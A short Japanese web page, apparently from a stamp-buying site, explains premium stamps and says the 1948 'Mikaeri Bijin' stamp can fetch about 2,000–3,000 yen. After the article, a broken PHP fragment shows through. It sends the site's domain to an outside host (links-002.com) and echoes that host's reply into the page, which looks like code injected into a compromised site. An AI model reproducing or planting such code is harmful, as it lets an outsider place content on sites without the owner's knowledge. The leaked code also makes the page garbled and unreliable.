前へ
次へ

プレミア切手なら高価買取を期待できます

切手には通常の切手とプレミア切手があり、このうち高値になりやすいのがプレミア切手です。ただ、プレミアつきの切手はそう多くないのが実情です。ちなみにここでいうプレミア切手というのは、額面より高い金額で買取ってもらえるものを言います。通常切手であっても、ごく一部のマニアに対して需要が高いものはプレミア化する可能性を秘めています。さて、そのようにプレミア切手は高値を期待できることが分かりましたが、どのようなものが該当するのでしょうか。プレミア切手にはいくつかの種類がありますが、そのひとつが「見返り美人」です。これは1948年に発行された記念切手であり、状態が良ければ高値になる可能性があります。それぞれの買取店によって変わってきますが、見返り美人のバラ切手であれば2000円から3000円程度を期待できます。見返り美人は発売当時より非常に人気が高く、現在でもプレミア価値が付いています。お持ちの方は、一度買取専門店で査定を受けてみてはいかがでしょうか。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top